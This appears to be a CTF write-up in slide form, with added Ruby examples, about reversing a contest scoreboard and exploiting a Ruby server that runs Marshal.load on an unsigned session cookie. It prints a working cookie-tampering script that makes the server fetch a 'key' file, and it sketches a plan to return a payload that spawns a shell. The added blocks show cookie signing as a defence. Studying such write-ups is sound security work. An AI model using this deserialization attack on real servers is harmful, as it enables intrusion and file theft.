10. The Score Board
● Java applet
● Annoying and slow
● The organisation is late
● Direct openssl connection
doesn't seem to work
11. The Score Board
● Let's start reversing with jad
● Class to communicate with the
server:
biz/ddtek/quals/QualsClient.class
● Need to do some patching to
remove UI related instructions
12. The Score Board
● Method to login
● Method to get the matrix of
challenges as an array
● Method to get the details for each
challenge
13. The Score Board
● Build 2 java apps to get score
and to get new challenge
● Build an IRC alert bot for new
challenge
● Fuzz/Try to inject ;)
● And share it with the team
14.
15. Powtent Pownables 300
● Ruby based
● HTTP based:
● Often the case
● No XSS or SQLi
● Just vulnerable and weird web
servers
16. PP300: 2 paths ???
● The version of Webrick seems
vulnerable:
WEBrick/1.3.1 (Ruby/1.8.7/2010-08-16)
● The cookie sent is identical
between 2 HTTP requests
without cookies...
20. How to lose an hour :/
{ "eNpj4YjmUTJTIBbE6+iq6qvWcClZEKtc" =>
"eNpj4YjmUTJTIBbE6+iq6qvWcClZEKtcHUTH6OurxhCjCaYBrElVv0aVsCZ9INQE6wVq
1gXyibEPjj5eH2SXqoaqgoK1goKqJtAmYoNBNUZVB0xxKZkQHXLqurqq6lwAdh80Ag==",
"eNqVlD1uwzAMhZcORQ5REFlqF1A4BujQ" =>
"eNqVlD1uwzAMhZcORQ5REFlqF1A4BujQJccoAdqD4dFDMmQgfPZKlKif=",
"mh7cJ%h99LPn1zSoh4,42!6e3t78Cw]i" =>
"eNpj4VCSySgpKbDS1zc0MtczAEJDK1MjCwNDfQBR/QXBn",
"eNqF0M0KwjAMAOCLB9nZBwjZpB1sy92t" =>
"eNqF0M0KwjAMAOCLB9nZBwjZpB1sy92t0KNP4MVK6hPsBfLwptOON5imtBTY9Sc
5HO8nbGA3mMhWeN7Nz3PQ+CUmHv4ICMyEPwURx2ERnR99twYiBO2JiFGBheDHZXSsgE
CKoCdEH1hy2nKKwcAiKC2tv2RA710tiFhE7Hs0sTzwuSk6F/RY9d3SREKePQavpke
a9e9BUh8CWGAWucqmGxlQqiE4h7VxG6Epm4Fy5htv7zAGtT5dtNJpSvW21QtSqV5v"}
z= Marshal.load(Base64.decode64(URI.decode(cookie)))
21. All values start with eN...
> s = "eNpj4YjmUTJTIBbE6+iq6qvWcClZEKtcHUTH6OurxhCjCaYBrElVv0aVsCZ9INQE6WVq1gXyibEPjj5eH2SXqoaQgoK1goKqJtAmYoNBNUZVB0xxKZkQHXLqurqq6lwAdh80Ag=="
> Base64.decode64(s).each_byte do |c|
>   print "\\x%02x" % c
> end
\x78\xda\x63\xe1\x88\xe6\x51\x32\x53\x20\x16\xc4\xeb\xe8\xaa\xea\xab
\xd6\x70\x29\x59\x10\xab\x5c\x1d\x44\xc7\xe8\xeb\xab\xc6\x10\xa3\x09
\xa6\x01\xac\x49\x55\xbf\x46\x95\xb0\x26\x7d\x20\xd4\x04\xe9\x6b\xea
\xd6\x05\xf2\x89\xb1\x0f\x8e\x3e\x5e\x1f\x64\x97\xaa\x86\xaa\x82\x82
\xb5\x82\x82\xaa\x26\xd0\x26\x62\x83\x41\x35\x46\x55\x07\x4c\x71\x29
\x99\x10\x1d\x72\xea\xba\xba\xaa\xea\x5c\x00\x76\x1f\x34\x02
… googling for “\x78\xda” links to
the zlib
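The header identification above, worked through as an added example (this is not code from the slides or from the challenge): the two bytes 0x78 0xda are a zlib stream header whose fields can be checked directly, and once inflated, the first bytes of a Marshal blob tell you what type Marshal.load would build without actually loading it. The sample URL and cookie values are constructed; the encoding (base64 of zlib of Marshal.dump) is the one the slides show.

```ruby
require 'zlib'
require 'base64'

# Decode the two-byte zlib stream header (RFC 1950). Returns nil when the
# bytes cannot be a zlib header, so callers can tell zlib from other blobs.
def zlib_header(raw)
  cmf, flg = raw.unpack('CC')
  return nil if cmf.nil? || flg.nil?
  return nil unless (cmf & 0x0f) == 8                 # CM: 8 = deflate, the only defined method
  return nil unless (((cmf << 8) | flg) % 31).zero?   # FCHECK: CMF*256+FLG must be a multiple of 31
  {
    method: 'deflate',
    window: 1 << ((cmf >> 4) + 8),   # CINFO = log2(window size) - 8; 7 -> 32 KiB
    preset_dict: (flg & 0x20) != 0,  # FDICT
    level: flg >> 6                  # FLEVEL: 0 fastest .. 3 maximum (0xda = level 3)
  }
end

# Type tags of Ruby's Marshal format (version 4.8). Reading the tag says what
# Marshal.load *would* build; 'o', 'u' and 'U' instantiate arbitrary classes,
# which is why Marshal.load on a client-supplied cookie is dangerous.
MARSHAL_TAGS = {
  '0' => 'nil', 'T' => 'true', 'F' => 'false', 'i' => 'Integer', ':' => 'Symbol',
  '"' => 'String', '[' => 'Array', '{' => 'Hash',
  'I' => 'object with ivars (e.g. String with encoding)',
  'o' => 'Object', 'u' => 'custom _load', 'U' => 'custom marshal_load'
}.freeze

def marshal_top_type(blob)
  return nil unless blob.bytesize >= 3 && blob.getbyte(0) == 4 && blob.getbyte(1) == 8
  tag = blob.getbyte(2).chr
  MARSHAL_TAGS.fetch(tag, "unknown tag #{tag.inspect}")
end

# Analyse one cookie value without ever calling Marshal.load on it.
def inspect_cookie_value(b64)
  raw = Base64.decode64(b64)
  header = zlib_header(raw)
  return { zlib: nil } if header.nil?
  inflated = Zlib::Inflate.inflate(raw)
  { zlib: header, inflated_bytes: inflated.bytesize, marshal_type: marshal_top_type(inflated) }
end

# The encoding the challenge server used, reproduced here for round-trip checks.
def encode_value(obj)
  Base64.strict_encode64(Zlib::Deflate.deflate(Marshal.dump(obj), Zlib::BEST_COMPRESSION))
end

if __FILE__ == $0
  # Constructed sample value, not a captured cookie.
  sample = encode_value('http://127.0.0.1:52801/')
  puts sample                 # begins with "eN", like every value in the dump
  p inspect_cookie_value(sample)
end
```

Every value in the dump starts with "eN" because base64 of 0x78 0xda followed by any byte always encodes to "eN" plus one of "o", "p", "q", "r"; the FLEVEL bits of 0xda are 3, matching Zlib::BEST_COMPRESSION.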
22. After a few lines of code
require 'zlib'
require 'base64'
# z is the Hash from the cookie dump; every value is base64(zlib(Marshal.dump(...)))
z.each do |p, v|
  puts
  puts Marshal.load(Zlib::Inflate.new.inflate(Base64.decode64(v)))
end
And you get...
23.
24. [ … ]
[ … ]
http://127.0.0.1:52801/
_//(
oo
<_.
__/"
//_`.
,@;@, ||/ )]
;@;@( @;@;@;@;@;@,_|/ / |
/a `@_|@;@;@;@(_____.' |
/ )@:@;@;@;@/@:@;@#|"""|
`--"'`;@;@;@;@|@;@;@`== )
`;@;;@;;@;@` || |
|| | ( __||H|
|| | // / =="#'=
// ( // / |__V_|
''"' '"'___<<____)
If you follow, there were 4 values...
… I removed the goatse...
25. We need to retrieve a file
named “key”...
require 'socket'
require 'zlib'
require 'base64'
require 'uri'
require 'pp'
# Key of the cookie entry whose value is the URL the server fetches
inte = "mh7cJ%h99LPn1zSoh4,42!6e3t78Cw]i"
url = Marshal.load(Zlib::Inflate.new.inflate(Base64.decode64(z[inte])))
pp url
url += "key"
# Re-encode the modified URL exactly the way the server does
zzzz = Zlib::Deflate.new(Zlib::BEST_COMPRESSION)
dst = Base64.encode64(zzzz.deflate(Marshal.dump(url), Zlib::FINISH))
zzzz.close
z[inte] = dst
# Send the whole hash back as the rack.session cookie (Ruby 1.8.7 era; URI.encode no longer exists in Ruby 3)
l = TCPSocket.new("pwn508.ddtek.biz", 52719)
s = URI.encode(Base64.encode64(Marshal.dump(z)))
lol = "GET / HTTP/1.0\r\nCookie: rack.session=#{s}\r\n\r\n"
puts lol
l.write lol
puts l.read
And we get...
27. So we need...
● A web server that responds with a Zlib
compressed response that is base64
encoded
● This response should declare a
function that will read a file or spawn a
shell
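The whole chain above works because the server takes the rack.session cookie back from the client, unsigned, and feeds it to Marshal.load. As an added example from the defender's side (not code from the slides, the challenge, or Rack itself), here is a minimal authenticated session cookie in Ruby: the body is JSON rather than Marshal, an HMAC-SHA256 over the encoded body is appended, and the body is only decoded after a constant-time MAC check. The secret and session contents are constructed test values; Rack's own Rack::Session::Cookie does something similar when given a :secret, but this code is not Rack's.

```ruby
require 'openssl'
require 'base64'
require 'json'

# Compare two strings in constant time so the MAC check cannot be timed byte by byte.
def secure_compare(a, b)
  return false unless a.bytesize == b.bytesize
  a.bytes.zip(b.bytes).reduce(0) { |acc, (x, y)| acc | (x ^ y) }.zero?
end

# Serialise the session as JSON (a tampered body can at worst yield odd data,
# never arbitrary objects the way Marshal.load can), base64 it, and append an
# HMAC-SHA256 over the encoded body keyed with the server-side secret.
def sign_session(session, secret)
  body = Base64.strict_encode64(JSON.generate(session))
  mac = OpenSSL::HMAC.hexdigest('SHA256', secret, body)
  "#{body}--#{mac}"
end

# Return the session hash only if the MAC verifies; nil for anything missing,
# malformed or modified. The body is decoded *after* the check, not before.
def verify_session(cookie, secret)
  body, mac = cookie.to_s.split('--', 2)
  return nil if body.nil? || mac.nil?
  expected = OpenSSL::HMAC.hexdigest('SHA256', secret, body)
  return nil unless secure_compare(mac, expected)
  JSON.parse(Base64.strict_decode64(body))
rescue ArgumentError, JSON::ParserError
  nil
end

if __FILE__ == $0
  secret = 'constructed-test-secret'   # constructed; a real secret is long and random
  cookie = sign_session({ 'user' => 'guest', 'url' => 'http://127.0.0.1:52801/' }, secret)
  p verify_session(cookie, secret)     # the original hash

  # The edit the slides perform: replace the body, keep the old MAC.
  _old_body, mac = cookie.split('--', 2)
  forged = Base64.strict_encode64(JSON.generate({ 'user' => 'admin' })) + '--' + mac
  p verify_session(forged, secret)     # nil: rejected before anything is parsed
end
```

With this in place the server still round-trips the same kind of cookie, but a client that changes the stored URL (or any other field) gets its cookie rejected at the MAC check, and even a valid cookie can only ever produce JSON values, not a Marshal object graph.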